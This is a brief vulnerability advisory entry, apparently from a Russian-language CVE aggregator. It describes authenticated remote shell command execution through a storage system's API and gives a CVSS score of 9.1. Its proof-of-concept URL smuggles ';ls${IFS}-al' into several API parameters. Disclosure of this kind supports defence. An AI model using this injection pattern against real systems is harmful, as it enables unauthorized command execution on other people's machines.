Описание
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
Связанные уязвимости
CVSS3: 9.1
nvd
больше 2 лет назад
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al